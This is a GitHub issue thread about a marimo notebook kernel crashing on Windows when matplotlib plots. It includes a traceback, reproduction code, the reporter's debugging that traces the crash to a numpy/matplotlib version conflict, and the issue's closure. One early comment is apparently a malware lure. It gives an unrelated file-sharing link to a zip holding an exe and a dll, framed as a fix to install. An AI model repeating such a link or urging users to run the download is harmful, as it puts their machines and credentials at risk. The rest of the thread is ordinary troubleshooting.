### ISSUE TITLE
matplotlib.pyplot as plt.plot(x,y) disconnect the kernel

### ISSUE THREAD

**Issue by switchball** [marimo-team/marimo#2214] opened 2024-09-04 13:36 UTC
### Describe the bug

I'm learning how to use plot with marimo, so I tried to use matplot.

But when i use `plt.plot(x,y)`, the kernel will quit. Traceback:

```
Exception in callback Distributor._on_change()
handle: <Handle Distributor._on_change()>
Traceback (most recent call last):
  File "D:\P\anaconda3\envs\py311\Lib\asyncio\events.py", line 80, in _run
    self._context.run(self._callback, *self._args)
  File "D:\P\anaconda3\envs\py311\Lib\site-packages\marimo\_utils\distributor.py", line 56, in _on_change
    response = self.input_connection.recv()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "D:\P\anaconda3\envs\py311\Lib\multiprocessing\connection.py", line 249, in recv
    buf = self._recv_bytes()
          ^^^^^^^^^^^^^^^^^^
  File "D:\P\anaconda3\envs\py311\Lib\multiprocessing\connection.py", line 413, in _recv_bytes
    buf = self._recv(4)
          ^^^^^^^^^^^^^
  File "D:\P\anaconda3\envs\py311\Lib\multiprocessing\connection.py", line 378, in _recv
    chunk = read(handle, remaining)
            ^^^^^^^^^^^^^^^^^^^^^^^
ConnectionResetError: [WinError 10054]

 The Python kernel died unexpectedly.
```

The version of `matplotlib` was `3.9.2`. Re-install this does not help.

The following code should reproduce this.

### Environment

{
  "marimo": "0.8.9",
  "OS": "Windows",
  "OS Version": "10",
  "Processor": "Intel64 Family 6 Model 183 Stepping 1, GenuineIntel",
  "Python Version": "3.11.5",
  "Binaries": {
    "Browser": "--",
    "Node": "--"
  },
  "Requirements": {
    "click": "8.1.7",
    "importlib-resources": "missing",
    "jedi": "0.19.1",
    "markdown": "3.6",
    "pymdown-extensions": "10.8.1",
    "pygments": "2.17.2",
    "tomlkit": "0.12.5",
    "uvicorn": "0.30.1",
    "starlette": "0.37.2",
    "websockets": "11.0.3",
    "typing-extensions": "4.8.0",
    "ruff": "0.6.3"
  }
}

### Code to reproduce

```
import marimo

__generated_with = "0.8.9"
app = marimo.App(width="medium")


@app.cell
def __():
    import numpy as np
    import matplotlib.pyplot as plt

    period = 2 * np.pi  
    amplitude = 1  

    x = np.linspace(0, 2 * period, 1000)

    y = amplitude * np.sin(x)
    return amplitude, np, period, plt, x, y


@app.cell
def __(plt, x, y):
    # Run this cell disconnect kernel
    plt.plot(x,y)
    return


if __name__ == "__main__":
    app.run()
```

**Comment by DavidSousaZ** [comment] 2024-09-04 13:36
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by switchball** [comment] 2024-09-04 13:43
The zip contains `x86_64-w64-ranlib.exe` and `msvcp140.dll`. I clicked the exe but nothing show up. Doubt what should i do with this?

**Comment by akshayka** [comment] 2024-09-04 18:52
Thank you for reporting. I am unable to reproduce this, but it's possible we're doing something subtly wrong in how we communicate between the kernel process and the server process

**Comment by switchball** [comment] 2024-09-07 15:57
After diggest into the problem, I think this is due to matplotlib lib crash. Adding some logs, I found that in `cell_runner.py`, it has
```
[D 240907 22:23:47 cell_runner:386] run_all has run_result = RunResult(output=[<matplotlib.lines.Line2D object at 0x0000022F357EDA50>], exception=None, accumulated_output=None)
[D 240907 22:23:47 cell_runner:389] run_all has done post hook <function _set_status_idle at 0x0000022F3335C680>
[D 240907 22:23:47 cell_runner:389] run_all has done post hook <function _broadcast_variables at 0x0000022F3335C860>
```
but missing the `post hook <function _broadcast_outputs at 0x000001DB2100C9A0>`. In this hook, a `format_output` is wrapped, in the `try_format` function:

```python
def try_format(obj: Any) -> FormattedOutput:
    obj = "" if obj is None else obj
    # LOGGER.debug("trying to format object of type %s %s", type(obj), get_formatter(obj))
    # trying to format object of type <class 'list'> <function StructuresFormatter.register.<locals>._format_structure at 0x000001FB87AF2C00>
    if (formatter := get_formatter(obj)) is not None:
        try:
            # The formatter() will crash
            mimetype, data = formatter(obj)
            # never run here
            return FormattedOutput(mimetype=mimetype, data=data)
        except Exception:  # noqa: E722
            # never run here either
            return FormattedOutput(
                mimetype="text/plain",
                data="",
                traceback=traceback.format_exc(),
            )
    ...
```

This is very strange since the `formatter` func did not raise any Exception.

So I run the vanilla python code of matplot, the figure just flashed and vanished. (maybe a conflict of numpy, matplotlib version) After I fixed the conflict, the plot showed up, and marimo code run normally.

So it is about the problem with the kernel process suddenly crashed with no traceback information provided. 
This teaches me a lesson: run the direct py script test first, and then do the marimo run.

**Comment by akshayka** [comment] 2024-09-13 05:50
Strange — thank you for digging in. Since I am unsure how to reproduce this, and it seems that it may be internal to matplotlib, I will close the issue. If it arises again, please reopen.

**Closed by akshayka** 2024-09-13 05:50 UTC
Labels: bug, help wanted, platform:windows
